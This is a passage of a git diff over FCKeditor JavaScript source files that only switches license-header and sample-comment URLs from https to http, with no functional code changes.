General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/commandclasses/fcktextcolorcommand.js b/admin/FCKeditor/editor/_source/commandclasses/fcktextcolorcommand.js index a68590f..220282a 100755 --- a/admin/FCKeditor/editor/_source/commandclasses/fcktextcolorcommand.js +++ b/admin/FCKeditor/editor/_source/commandclasses/fcktextcolorcommand.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/fckconstants.js b/admin/FCKeditor/editor/_source/fckconstants.js index 412e64e..75ef9bd 100755 --- a/admin/FCKeditor/editor/_source/fckconstants.js +++ b/admin/FCKeditor/editor/_source/fckconstants.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/fckeditorapi.js b/admin/FCKeditor/editor/_source/fckeditorapi.js index 79504f6..c82cb7f 100755 --- a/admin/FCKeditor/editor/_source/fckeditorapi.js +++ b/admin/FCKeditor/editor/_source/fckeditorapi.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/fckjscoreextensions.js b/admin/FCKeditor/editor/_source/fckjscoreextensions.js index ceb0064..dd4e1f7 100755 --- a/admin/FCKeditor/editor/_source/fckjscoreextensions.js +++ b/admin/FCKeditor/editor/_source/fckjscoreextensions.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/fckscriptloader.js b/admin/FCKeditor/editor/_source/fckscriptloader.js index 7022a2b..6922783 100755 --- a/admin/FCKeditor/editor/_source/fckscriptloader.js +++ b/admin/FCKeditor/editor/_source/fckscriptloader.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fck.js b/admin/FCKeditor/editor/_source/internals/fck.js index 4b51238..81d6f9e 100755 --- a/admin/FCKeditor/editor/_source/internals/fck.js +++ b/admin/FCKeditor/editor/_source/internals/fck.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fck_contextmenu.js b/admin/FCKeditor/editor/_source/internals/fck_contextmenu.js index 83be446..77cf616 100755 --- a/admin/FCKeditor/editor/_source/internals/fck_contextmenu.js +++ b/admin/FCKeditor/editor/_source/internals/fck_contextmenu.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fck_gecko.js b/admin/FCKeditor/editor/_source/internals/fck_gecko.js index 81376fd..761ca59 100755 --- a/admin/FCKeditor/editor/_source/internals/fck_gecko.js +++ b/admin/FCKeditor/editor/_source/internals/fck_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fck_ie.js b/admin/FCKeditor/editor/_source/internals/fck_ie.js index 4dbdf41..1e4d5c9 100755 --- a/admin/FCKeditor/editor/_source/internals/fck_ie.js +++ b/admin/FCKeditor/editor/_source/internals/fck_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckbrowserinfo.js b/admin/FCKeditor/editor/_source/internals/fckbrowserinfo.js index 6dad589..6c2372a 100755 --- a/admin/FCKeditor/editor/_source/internals/fckbrowserinfo.js +++ b/admin/FCKeditor/editor/_source/internals/fckbrowserinfo.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckcodeformatter.js b/admin/FCKeditor/editor/_source/internals/fckcodeformatter.js index fffd64a..f5e1183 100755 --- a/admin/FCKeditor/editor/_source/internals/fckcodeformatter.js +++ b/admin/FCKeditor/editor/_source/internals/fckcodeformatter.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckcommands.js b/admin/FCKeditor/editor/_source/internals/fckcommands.js index c43ff36..6de6253 100755 --- a/admin/FCKeditor/editor/_source/internals/fckcommands.js +++ b/admin/FCKeditor/editor/_source/internals/fckcommands.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckconfig.js b/admin/FCKeditor/editor/_source/internals/fckconfig.js index 3da56cc..108aaad 100755 --- a/admin/FCKeditor/editor/_source/internals/fckconfig.js +++ b/admin/FCKeditor/editor/_source/internals/fckconfig.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckdebug.js b/admin/FCKeditor/editor/_source/internals/fckdebug.js index cc1d3bd..6bfaa8c 100755 --- a/admin/FCKeditor/editor/_source/internals/fckdebug.js +++ b/admin/FCKeditor/editor/_source/internals/fckdebug.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckdialog.js b/admin/FCKeditor/editor/_source/internals/fckdialog.js index e872bb2..4cb2076 100755 --- a/admin/FCKeditor/editor/_source/internals/fckdialog.js +++ b/admin/FCKeditor/editor/_source/internals/fckdialog.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckdialog_gecko.js b/admin/FCKeditor/editor/_source/internals/fckdialog_gecko.js index 904a0b9..6397991 100755 --- a/admin/FCKeditor/editor/_source/internals/fckdialog_gecko.js +++ b/admin/FCKeditor/editor/_source/internals/fckdialog_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckdialog_ie.js b/admin/FCKeditor/editor/_source/internals/fckdialog_ie.js index 0e2e579..24d1dc0 100755 --- a/admin/FCKeditor/editor/_source/internals/fckdialog_ie.js +++ b/admin/FCKeditor/editor/_source/internals/fckdialog_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckdocumentprocessor.js b/admin/FCKeditor/editor/_source/internals/fckdocumentprocessor.js index bedb6a6..d42fc7c 100755 --- a/admin/FCKeditor/editor/_source/internals/fckdocumentprocessor.js +++ b/admin/FCKeditor/editor/_source/internals/fckdocumentprocessor.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -124,7 +124,7 @@ FCKFlashProcessor.ProcessDocument = function( document ) { /* Sample code: - This is some <embed src="/UserFiles/Flash/Yellow_Runners.swf"></embed><strong>sample text</strong>. You are <a name="fred"></a> using <a href="https://www.fckeditor.net/">FCKeditor</a>. + This is some <embed src="/UserFiles/Flash/Yellow_Runners.swf"></embed><strong>sample text</strong>. You are <a name="fred"></a> using <a href="http://www.fckeditor.net/">FCKeditor</a>. */ var aEmbeds = document.getElementsByTagName( 'EMBED' ) ; diff --git a/admin/FCKeditor/editor/_source/internals/fckdomtools.js b/admin/FCKeditor/editor/_source/internals/fckdomtools.js index ebba779..7087d77 100755 --- a/admin/FCKeditor/editor/_source/internals/fckdomtools.js +++ b/admin/FCKeditor/editor/_source/internals/fckdomtools.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fcklanguagemanager.js b/admin/FCKeditor/editor/_source/internals/fcklanguagemanager.js index 376e151..3137f00 100755 --- a/admin/FCKeditor/editor/_source/internals/fcklanguagemanager.js +++ b/admin/FCKeditor/editor/_source/internals/fcklanguagemanager.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fcklisthandler.js b/admin/FCKeditor/editor/_source/internals/fcklisthandler.js index 1eb298f..c783bbe 100755 --- a/admin/FCKeditor/editor/_source/internals/fcklisthandler.js +++ b/admin/FCKeditor/editor/_source/internals/fcklisthandler.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fcklistslib.js b/admin/FCKeditor/editor/_source/internals/fcklistslib.js index 7866d7a..cfaaf1b 100755 --- a/admin/FCKeditor/editor/_source/internals/fcklistslib.js +++ b/admin/FCKeditor/editor/_source/internals/fcklistslib.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckplugins.js b/admin/FCKeditor/editor/_source/internals/fckplugins.js index 8738c45..dcdb5b8 100755 --- a/admin/FCKeditor/editor/_source/internals/fckplugins.js +++ b/admin/FCKeditor/editor/_source/internals/fckplugins.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckregexlib.js b/admin/FCKeditor/editor/_source/internals/fckregexlib.js index 449e011..c57bec8 100755 --- a/admin/FCKeditor/editor/_source/internals/fckregexlib.js +++ b/admin/FCKeditor/editor/_source/internals/fckregexlib.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckselection.js b/admin/FCKeditor/editor/_source/internals/fckselection.js index f330c87..dbb1766 100755 --- a/admin/FCKeditor/editor/_source/internals/fckselection.js +++ b/admin/FCKeditor/editor/_source/internals/fckselection.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckselection_gecko.js b/admin/FCKeditor/editor/_source/internals/fckselection_gecko.js index 6f751e0..0e141a1 100755 --- a/admin/FCKeditor/editor/_source/internals/fckselection_gecko.js +++ b/admin/FCKeditor/editor/_source/internals/fckselection_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckselection_ie.js b/admin/FCKeditor/editor/_source/internals/fckselection_ie.js index c70b156..7e6b21f 100755 --- a/admin/FCKeditor/editor/_source/internals/fckselection_ie.js +++ b/admin/FCKeditor/editor/_source/internals/fckselection_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fcktablehandler.js b/admin/FCKeditor/editor/_source/internals/fcktablehandler.js index b32fc6e..9584464 100755 --- a/admin/FCKeditor/editor/_source/internals/fcktablehandler.js +++ b/admin/FCKeditor/editor/_source/internals/fcktablehandler.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fcktablehandler_gecko.js b/admin/FCKeditor/editor/_source/internals/fcktablehandler_gecko.js index ec3bf51..0d42987 100755 --- a/admin/FCKeditor/editor/_source/internals/fcktablehandler_gecko.js +++ b/admin/FCKeditor/editor/_source/internals/fcktablehandler_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico 